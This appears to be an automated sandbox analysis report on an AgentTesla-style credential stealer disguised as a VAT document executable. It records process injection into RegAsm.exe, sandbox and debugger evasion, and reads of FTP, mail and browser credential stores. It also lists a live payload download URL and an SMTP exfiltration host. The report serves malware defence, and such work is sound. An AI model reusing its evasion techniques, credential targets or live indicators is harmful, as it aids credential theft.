          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079108444.000000000061D000.00000004.00000020.sdmpBinary or memory string: BROGRAM FILES\QEMU-GA\QEMU-GA.EXELY
          Source: RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1NGJIOP3ZBSXKQDZRXRFCGNWU41BLOY9FWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079843792.00000000022E0000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079843792.00000000022E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079189845.0000000000634000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1588Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0087BBDA rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9951
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeSystem information queried: ModuleInformation
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079843792.00000000022E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
          Source: RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9Fwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079108444.000000000061D000.00000004.00000020.sdmpBinary or memory string: brogram Files\Qemu-ga\qemu-ga.exely
          Source: RegAsm.exe, 00000014.00000002.5607273595.0000000000C98000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079843792.00000000022E0000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000002.1079189845.0000000000634000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0087BBDA rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00870448 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9A0000
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: RegAsm.exe, 00000014.00000002.5616187051.0000000001280000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: RegAsm.exe, 00000014.00000002.5616187051.0000000001280000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000014.00000002.5616187051.0000000001280000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 00000014.00000002.5616187051.0000000001280000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9184, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9184, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9184, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery431Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1362 Sample: Dokument VAT I - 85926 09 2... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 19 mail.reyesyasociados.com 2->19 21 prda.aadg.msidentity.com 2->21 23 3 other IPs or domains 2->23 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Sigma detected: RegAsm connects to smtp port 2->35 37 2 other signatures 2->37 8 Dokument VAT I - 85926 09 2021 MAG-8.exe 1 2->8         started        signatures3 process4 signatures5 39 Writes to foreign memory regions 8->39 41 Tries to detect Any.run 8->41 43 Hides threads from debuggers 8->43 11 RegAsm.exe 9 8->11         started        15 RegAsm.exe 8->15         started        process6 dnsIp7 25 mail.reyesyasociados.com 109.169.39.245, 49746, 587 IOMART-ASGB United Kingdom 11->25 27 googlehosted.l.googleusercontent.com 142.250.185.225, 443, 49721 GOOGLEUS United States 11->27 29 2 other IPs or domains 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 55 3 other signatures 11->55 17 conhost.exe 11->17         started        51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->53 signatures8 process9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Dokument VAT I - 85926 09 2021 MAG-8.exe21%VirustotalBrowse
          Dokument VAT I - 85926 09 2021 MAG-8.exe13%ReversingLabsWin32.Trojan.Mucc

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://gnOVon.com0%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://sectigo.com/CPS00%Avira URL Cloudsafe
          http://mail.reyesyasociados.com0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          https://Qwh5PdqjYgeEDA.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          142.250.186.78
          truefalse
            high
            googlehosted.l.googleusercontent.com
            142.250.185.225
            truefalse
              high
              mail.reyesyasociados.com
              109.169.39.245
              truetrue
                unknown
                doc-10-50-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-10-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6chkrap6m6ju294o2tb81ut9j/1632741825000/00519186742208262786/*/1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://doc-10-50-docs.googleusercontent.com/RegAsm.exe, 00000014.00000002.5608363099.0000000000CDA000.00000004.00000020.sdmpfalse
                      high
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://gnOVon.comRegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://DynDns.comDynDNSRegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://sectigo.com/CPS0RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://mail.reyesyasociados.comRegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/RegAsm.exe, 00000014.00000002.5607273595.0000000000C98000.00000004.00000020.sdmpfalse
                        high
                        https://drive.google.com/qRegAsm.exe, 00000014.00000002.5607273595.0000000000C98000.00000004.00000020.sdmpfalse
                          high
                          https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000014.00000002.5630557276.000000001DAE8000.00000004.00000001.sdmpfalse
                            high
                            https://Qwh5PdqjYgeEDA.comRegAsm.exe, 00000014.00000002.5630991580.000000001DB2E000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5631232287.000000001DB48000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5631519492.000000001DB72000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-10-50-docs.googleusercontent.com/BRegAsm.exe, 00000014.00000002.5608363099.0000000000CDA000.00000004.00000020.sdmpfalse
                              high
                              https://doc-10-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6RegAsm.exe, 00000014.00000003.1051560437.0000000000D1E000.00000004.00000001.sdmpfalse
                                high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
